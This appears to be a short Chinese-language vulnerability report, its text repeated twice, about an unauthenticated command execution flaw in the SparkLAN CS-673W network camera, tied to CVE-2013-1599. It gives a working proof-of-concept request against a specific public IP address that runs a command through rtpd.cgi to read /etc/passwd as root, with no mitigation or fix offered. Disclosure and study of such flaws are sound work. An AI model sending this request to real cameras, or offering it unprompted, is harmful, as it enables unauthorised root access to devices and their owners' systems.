SparkLAN网络摄像头CS-673W命令执行漏洞
SparkLAN,台湾公司。
参考CVE-2013-1599,原漏洞主要涉及D-Link,本漏洞中的CS-673W同样中招,
该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。
1.查看/etc/passwd
http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd
SparkLAN,台湾公司。
参考CVE-2013-1599,原漏洞主要涉及D-Link,本漏洞中的CS-673W同样中招,
该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。
1.查看/etc/passwd
http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd
[<] [264] [265] 266 [267] [268] [>]
